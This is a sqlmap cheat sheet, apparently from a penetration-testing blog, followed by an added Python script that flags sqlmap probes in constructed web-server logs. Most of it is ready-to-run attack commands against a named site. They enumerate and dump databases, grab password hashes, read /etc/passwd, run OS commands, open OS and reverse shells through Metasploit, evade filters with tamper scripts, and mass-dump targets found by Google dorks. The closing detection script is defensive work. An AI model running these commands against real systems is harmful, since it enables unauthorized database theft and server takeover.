Common tools for penetration testing: sqlmap

Basic usage

sqlmap -u "url"

Scans the target and prints basic information about the backend (web server, DBMS), as shown in the figure:

sqlmap -u "url" --current-user

Dump the name of the current database user

sqlmap -u "url" --current-db

Dump the name of the current database

sqlmap -u "url" --tables -D "db_name"

Enumerate the table names in the given database (-D)

sqlmap -u "url" --columns -T "table_name" -D "db_name" -v 0

Enumerate the columns of the given table (-T) in the given database (-D).

sqlmap -u "url" --dump -C "column_name" -T "table_name" -D "db_name" -v 0

Dump the records of the specified columns (-C).

Information gathering

List other databases

sqlmap -u "url" --dbs

Enumerate database user roles

sqlmap -u "url" --roles

sqlmap -u "url" --dump-all

Dump everything (the slang 脱裤, dumping the whole database)

The dump files are written under the .sqlmap directory in the home directory (/root/.sqlmap when running as root).

PS

SQLMAP usage notes

*** Basic steps

sqlmap -u "http://doscn.org/news?id=1" --current-user   # get the current user name
sqlmap -u "http://doscn.org/news?id=1" --current-db   # get the current database name
sqlmap -u "http://doscn.org/news?id=1" --tables -D "db_name"   # list the tables in a database
sqlmap -u "http://doscn.org/news?id=1" --columns -T "table_name" -D "db_name" -v 0   # list the columns of a table
sqlmap -u "http://doscn.org/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0   # dump the contents of the given columns
sqlmap -u "http://doscn.org/news?id=1" --smart --level 3 --users   # --smart: only run thorough tests where a heuristic suggests injection; --level: depth of the tests
sqlmap -u "http://doscn.org/news?id=1" --dbms "Mysql" --users   # --dbms: specify the database type
sqlmap -u "http://doscn.org/news?id=1" --users   # list the database users
sqlmap -u "http://doscn.org/news?id=1" --dbs   # list the databases
sqlmap -u "http://doscn.org/news?id=1" --passwords   # database user password hashes
sqlmap -u "http://doscn.org/news?id=1" --passwords -U root -v 0   # password hash of the specified database user
sqlmap -u "http://doscn.org/news?id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20   # dump the specified columns, rows 1 to 20
sqlmap -u "http://doscn.org/news?id=1" --dump-all -v 0   # dump all tables in all databases
sqlmap -u "http://doscn.org/news?id=1" --privileges   # view privileges
sqlmap -u "http://doscn.org/news?id=1" --privileges -U root   # view the privileges of the specified user
sqlmap -u "http://doscn.org/news?id=1" --is-dba -v 1   # is the current user the database administrator?
sqlmap -u "http://doscn.org/news?id=1" --roles   # enumerate database user roles
sqlmap -u "http://doscn.org/news?id=1" --udf-inject   # inject user-defined functions (can lead to operating-system level access!)
sqlmap -u "http://doscn.org/news?id=1" --dump-all --exclude-sysdbs -v 0   # dump all tables, skipping the system databases
sqlmap -u "http://doscn.org/news?id=1" --union-cols "COLUMN_RANGE"   # range of columns to test for UNION query injection (e.g. 12-16)
sqlmap -u "http://doscn.org/news?id=1" --cookie "COOKIE_VALUE"   # cookie injection
sqlmap -u "http://doscn.org/news?id=1" -b   # get the banner
sqlmap -u "http://doscn.org/news?id=1" --data "id=3"   # POST injection
sqlmap -u "http://doscn.org/news?id=1" -v 1 -f   # fingerprint the database type
sqlmap -u "http://doscn.org/news?id=1" --proxy "http://127.0.0.1:8118"   # inject through a proxy
sqlmap -u "http://doscn.org/news?id=1" --string="STRING_ON_TRUE_PAGE"   # keyword that appears in the response only when the injected condition is true
sqlmap -u "http://doscn.org/news?id=1" --sql-shell   # execute the specified SQL statements
sqlmap -u "http://doscn.org/news?id=1" --file-read /etc/passwd   # read a file from the database server's file system
sqlmap -u "http://doscn.org/news?id=1" --os-cmd=whoami   # execute an operating-system command

sqlmap -u "http://doscn.org/news?id=1" --os-shell   # interactive operating-system shell
sqlmap -u "http://doscn.org/news?id=1" --os-pwn   # reverse (bounce) shell
sqlmap -u "http://doscn.org/news?id=1" --reg-read   # read the Windows registry
sqlmap -u "http://doscn.org/news?id=1" --dbs -s "sqlmap.sqlite"   # save progress in a session file
sqlmap -u "http://doscn.org/news?id=1" --dbs -s "sqlmap.sqlite"   # run again with the same session file to resume the saved progress
sqlmap -u "http://doscn.org/news?id=1" --msf-path=/opt/metasploit3/msf2 --os-pwn   # --os-pwn needs the Metasploit path
sqlmap -u "http://doscn.org/news?id=1" --tamper "base64encode.py"   # load a tamper script (used to get past injection filters)
sqlmap -g "google dork" --dump-all --batch   # take the injection points from a Google search and dump all fields automatically
Attack example:
sqlmap -u "http://doscn.org/news?id=1&Submit=Submit" --cookie="PHPSESSID=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --passwords
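As an added defender-side example (not from the original post), this Python script parses constructed Apache combined-format access log lines, like the ones a run against news?id=1 would leave behind, and flags requests that carry sqlmap's default User-Agent or typical boolean/UNION probe payloads in a query parameter. The log lines, IP addresses and sqlmap version string are constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qsl

# Apache/nginx "combined" log format (assumption: default field order).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Fragments typical of sqlmap's boolean-, time- and UNION-based probes.
PAYLOAD_RE = re.compile(
    r"union\s+(all\s+)?select|sleep\(|benchmark\(|\band\s+\d+\s*=\s*\d+|@@version|information_schema",
    re.IGNORECASE,
)

# Constructed sample log: one clean request, two sqlmap probes, one unrelated client.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2020:10:00:01 +0000] "GET /news?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Mar/2020:10:00:02 +0000] "GET /news?id=1%20AND%201%3D1 HTTP/1.1" 200 512 "-" "sqlmap/1.4.3#stable (http://sqlmap.org)"',
    '203.0.113.7 - - [10/Mar/2020:10:00:03 +0000] "GET /news?id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL--%20- HTTP/1.1" 500 0 "-" "sqlmap/1.4.3#stable (http://sqlmap.org)"',
    '198.51.100.9 - - [10/Mar/2020:10:00:04 +0000] "GET /news?id=2 HTTP/1.1" 200 640 "-" "Mozilla/5.0"',
]

def reasons(line):
    """Return why a log line looks like sqlmap traffic ([] if clean, None if unparseable)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    found = []
    # The User-Agent is trivially changed by the attacker, so it is only a weak signal.
    if m.group("ua").lower().startswith("sqlmap/"):
        found.append("default sqlmap User-Agent")
    # parse_qsl URL-decodes the values, so payloads hidden behind %20 / %3D become visible.
    for name, value in parse_qsl(urlsplit(m.group("path")).query, keep_blank_values=True):
        if PAYLOAD_RE.search(value):
            found.append(f"injection pattern in parameter '{name}'")
    return found

def scan(lines):
    """Count suspicious requests per source IP, the unit an analyst would pivot on."""
    hits = Counter()
    for line in lines:
        if reasons(line):
            hits[LOG_RE.match(line).group("ip")] += 1
    return dict(hits)

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```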
